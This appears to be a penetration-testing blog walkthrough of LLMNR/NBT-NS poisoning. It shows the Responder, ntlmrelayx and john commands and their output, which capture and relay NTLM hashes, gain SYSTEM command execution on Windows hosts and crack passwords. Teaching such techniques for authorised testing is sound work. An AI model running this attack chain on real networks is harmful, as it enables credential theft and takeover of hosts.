System Shell using NBT-NS, LLMNR & MDNS Poisoning

Background

LLMNR & NBT-NS relay attack is a common way to compromise a Windows host by capturing hashes for cracking or relaying it to another host for authentication.  This method is usually used when I  can’t find critical vulns like MS17-010. SMB relay attacks also requires a Windows host to attempt to resolve a SMB share or connect to a Windows Auth mechanism which will in turn invoke a NBT broadcast to the attacker machine. The attacker is listening using a responder on common ports, waiting to capture the smb hashes. More info here and here.

From experience, relay attack  is usually a waiting game and of chance; you activate the responder to invoke/poison the network for LLMNR and NBT requests, at the same time, use a multi relayer like ntlmrelay.py to relay smb hash to a bunch of victim hosts. Next, is to wait and pray for a catch. In a large network, you are bound to get a bite in a matter of minutes.

Remember that smb signing must be turned off before this attack will work, so the best way is to run a fingerprint of the victim hosts first.

Enumeration Steps

On the attacker machine, run a responder to listen for incoming connections. Note: if you intend to use the responder-MultiRelay, edit /usr/share/responder/Responder.conf and disable:

SMB server
HTTP server

# responder -I eth0 -rwd

Successfull start of responder on attacker machine:

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS               [ON]

[+] Servers:
  HTTP server                [OFF]
    HTTPS server             [ON]
    WPAD proxy             [OFF]
    Auth proxy                [OFF]
SMB server                 [OFF]
    Kerberos server        [ON]
    SQL server                [ON]
    FTP server                 [ON]
    IMAP server            [ON]
    POP3 server             [ON]
    SMTP server             [ON]
    DNS server                [ON]
    LDAP server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML                [OFF]
    Upstream Proxy              [OFF]

[+] Poisoning Options:
    Analyze Mode                [OFF]
    Force WPAD auth          [OFF]
    Force Basic Auth            [OFF]
    Force LM downgrade     [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP                [172.16.6.11]
    Challenge set              [random]
    Don’t Respond To Names     [‘ISATAP’]


[+] Listening for events…


Once responder is running, it will auto save smb hashes into /usr/share/responder/logs/, the hashes here can be cracked using john or hashcat. But we would like to relay the hash to victim hosts to execute our evil deeds.  I couldn’t get responder-MultiRelay to work so I am using ntlmrelay.py.

Firstly, comes the enumeration bit, I will identify hosts with smb signing turned off using this cmd:

# responder-RunFinger -i 172.16.16.0/24 -g > smb-hosts.txt

[‘172.16.16.64′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.63′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:26′, Null Session: True, MS17-010: False]
[‘172.16.16.66′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.34′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.74′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.77′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.79′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.80′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:26′, Null Session: True, MS17-010: False]
[‘172.16.16.71′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.70′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:26′, Null Session: True, MS17-010: False]
[‘172.16.16.89′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.76′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]
[‘172.16.16.56′, Os:’indows 7 Professional 7601 Service Pack 1′, Domain:’xxx’, Signing:’False’, Time:’2021-01-24 13:58:25′, Null Session: True, MS17-010: False]


With a bit of awk or cut or sed whichever you prefer, paste the IP addresses into a target file.

# cat smb-hosts.txt | grep False | cut -d \’ -f2 > targets.txt

Multi Relay Attack

After formatting the targets, feed it into ntlmrelay.py.

# ntlmrelay.py -tf targets.txt -c whoami

Impacket v0.9.19-dev – Copyright 2018 SecureAuth Corporation

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server

[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.241
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.241 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.27
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.27 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.28
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.26
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.28 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.248
[*] Authenticating against smb://172.16.21.26 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.13
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.248 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.16
[*] Authenticating against smb://172.16.21.13 as xxx\xxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.9 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] Executed specified command on host: 172.16.21.17
nt authority\system

[*] Stopping service RemoteRegistry
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.0
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.0 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.3
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.253
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat


If ntlmrelay.py was successful, you should get command execution on the hosts, as you can see above, the whoami returned a result. From here, you can target the specific victim and directly invoke a meterpreter or Empire agent on the machine or any evil cmd:

# ntlmrelayx.py -t 172.16.21.17 -c dir

Impacket v0.9.19-dev – Copyright 2018 SecureAuth Corporation

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.17 as xxxx\xxxx SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 172.16.21.17
 Volume in drive C has no label.
 Volume Serial Number is 806C-3558

 Directory of C:\Windows\system32

24/01/2021  01:27 PM    <DIR>          .
24/01/2021  01:27 PM    <DIR>          ..
21/11/2019  03:06 PM    <DIR>          0409
19/12/2012  06:40 AM             3,774 2hps.ico
30/07/2013  02:10 PM            21,824 accelerometerdll.DLL
21/11/2010  11:24 AM         3,745,792 accessibilitycpl.dll
14/07/2009  09:24 AM            39,424 ACCTRES.dll
14/07/2009  09:40 AM             9,216 acledit.dll
14/07/2009  09:40 AM           154,112 aclui.dll
……………. …………………….

Cracking Hash

If multi relay did not work for you, don’t give up yet, you can always try cracking the hashes:

# cd /usr/share/responder/logs/
# ls
Analyzer-Session.log       
Responder-Session.log             
SMB-Relay-SMB-192.168.197.135.txt
Config-Responder.log             
SMB-Relay-192.168.197.135.txt     
SMBv2-NTLMv2-SSP-192.168.197.135.txt
HTTP-NTLMv2-192.168.197.135.txt 
SMBRelay-Session.txt
Poisoners-Session.log           
SMB-Relay-SMB-192.168.197.133.txt

Lets feed it into john:

# john SMB* -wordlist=/tmp/wordlist.txt
Using default input encoding: UTF-8
Loaded 10 password hashes with 10 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Remaining 8 password hashes with 8 different salts
Press ‘q’ or Ctrl-C to abort, almost any other key for status
xxxxxxxx      (user01)
xxxxxxxx      (user01)
xxxxxxxx      (user01)
xxxxxxxx      (user01)
xxxxxxxx      (user01)
xxxxxxxx      (user01)
xxxxxxxx      (user01)
Administrator      (Administrator)
8g 0:00:00:00 DONE (2021-01-25 15:25) 800.0g/s 100.0p/s 800.0c/s 800.0C/s xxxxxxx
Warning: passwords printed above might not be all those cracked
Use the “–show” option to display all of the cracked passwords reliably
Session completed

Summary

There you go folks, responder or multi relay attacks should be part of your pen-testing arsenal. So remember to try it in your next engagement exercise.